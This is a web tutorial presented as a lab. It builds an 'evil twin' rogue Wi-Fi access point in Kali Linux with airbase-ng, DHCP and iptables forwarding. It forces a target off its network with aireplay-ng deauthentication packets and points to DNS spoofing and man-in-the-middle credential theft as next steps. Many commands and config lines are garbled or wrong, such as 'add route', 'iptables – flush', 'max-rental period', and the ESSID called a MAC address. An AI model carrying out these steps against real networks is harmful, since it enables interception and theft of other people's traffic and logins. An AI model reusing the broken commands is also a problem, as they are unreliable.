Lab: Wi-Fi Security 2023

We will learn about Lab: Wi-Fi Security in this article.

Introduction to Lab: Wi-Fi Security:

This lab includes steps to set up a test environment, create a rogue wireless access point, assign an Internet connection to the rogue access point, and force the victim to connect to the rogue access point.

Required items:

1. Wireless adapter: A wireless adapter is required for packet sniffing and injection. It is readily available on Amazon.
2. Backtrack OS or Kali Linux: These are linux distributions and have lots of pen testing tools.
3. Wireless Network: Ensure that the user has access and control over one wireless access point. This exercise must not be practiced on the access point of others.
4. Target machine: This machine can be your local machine or a virtual machine image. You can use a Windows 7 virtual machine image for this exercise.

Exercise: Setting up a rogue access point.

Step 1: Start VMware Workstation and load the Kali Linux virtual machine image. Click the “Edit Virtual Machine Settings” link, go to “Network Adapter” and select “Bridge” in the “Network Connection” field.

Step 2: Start Kali Linux and login as root user. The default username and password are root and toor.

Step 3: Connect the wireless adapter to the laptop. The user should be able to see the wireless adapter under the Removable Devices option with a blue check mark. If the check mark is not present, select the wireless adapter and select Connect. This will disconnect the wireless adapter from the Windows operating system and connect to Kali. This is shown in the screenshot below.

Step 4: Launch a new terminal and enter the following command to check the IP address of the gateway.

route -n

In our case, the gateway is 192.168.0.1

Step 5: To get the network interface list, enter the following command as shown in the following screenshot.

airmon-ng

We have one interface called wlan5. This may vary from machine to machine.

Step 6: Check what all access points are available near the user. Run the following command as shown in the following screenshots.

airodump -ng wlan5

This will start capturing traffic and start displaying a list of available access points near the user along with the BSSID (MAC address of the access point) and the channel of the access points.

Note the values ​​in the PWR column. The closest router will have the smallest value.

Step 7: Note the BSSID value and channel number of the access point the user is interested in. Also note the MAC address of the target device.

In our case, the BSSID value is 5E:F9:6A:29:28:18, the channel is 2, and the MAC id of the target computer is
68:5D:43:7D:F7:E9.

Step 8: We need to set up a DHCP server to provide internet to the fake access point. Use the following command to install a DHCP server in Kali:

apt-get install isc-dhcp-server

After installation, use the following command to change the contents of the dhcpd.conf file as shown below.

leafpad /etc/dhcpd.conf

authoritative;

default-lease-time 600;

max-rental period 7200;

subnet 192.168.1.0 netmask 255.255.255.0 {

optional routers 192.168.1.1;

option subnet mask 255.255.255.0;

option domain name “Epson_Printer”;

choosing domain name servers 192.168.1.1;

range 192.168.1.2 192.168.1.40;

}

Save and close the file.

Repeat the above step for the /etc/dhcpd/dhcpd.conf file as well.

Step 9: Open a new terminal and use the following command to create a new access point with an ESSID similar to our victim access point i.e. “Epson_Printer”.

• airbase-ng –e Epson_Printer -c 2 wlan5
• e is the ESSID (MAC address) of the access point.
  
• c is the channel for the wireless network.
  
• wlan5 is the interface name.

Now a new access point named “Epson_Printer” is created.

Step 10: Now we will open a new terminal and monitor the traffic on the newly created access point with the following command:

airodump-ng –bssid 00:C0:CA:70:8F:25 -C 2 wlan 5

Step 11: Check the command window of step number 5. The newly created access point should be visible now.

Step 12: Now we need to provide internet to the fake access point. Open a new terminal and execute the following set of commands one by one.

• ifconfig at0 192.168.1.1 netmask 255.255.255.0
• ifconfig at0 mtu 1400
• add route -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
• iptables – flush
• iptables –table nat –flush
• iptables –delete-chain
• iptables –table nat –delete-chain
• echo 1 > /proc/sys/net/ipv4/ip_forward
• iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.0.1 (gateway)
• iptables -P FORWARD ACCEPT
• iptables –connect FORWARD –v interface at0 -j ACCEPT
• iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
• iptables -t nat -A FORWARD -p tcp –destination-port 80 -j FORWARD –to-port 10000
• dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
• /etc/init.d/isc-dhcp-server start

Step 13: We can either wait for someone to connect to this fake access point or we can forcefully deauthenticate our connected target to try to connect to the access point again.

We can use the following command to send deauthentication packets:

• aireplay-ng –deauth 0 -a 5E:F9:6A:29:28:18 -c 68:5D:43:7D:F7:E9 wlan5
• 5E:F9:6A:29:28:18 is the MAC address of the access point.
  
• 0 is de-authentication.
  
• -c is the MAC address of the target computer.
  
• wlan5 is the interface name.

The following screenshot shows the wireless adapter sending a deauthentication packet to the access point. The target computer is disconnected from the “Epson_Printer” access point and is trying to reconnect as the following screenshot shows.

The victim is now connected to the fake access point. From there, an attacker can perform various attacks, such as DNS spoofing to redirect a connected victim to a fake website and obtain credentials, or use sslstrip and ettercap to perform a MiTM (Man in The Middle) attack.

Related article:Everything you need to know about Ethical Hacking as a Career by Blackhat Pakistan 2023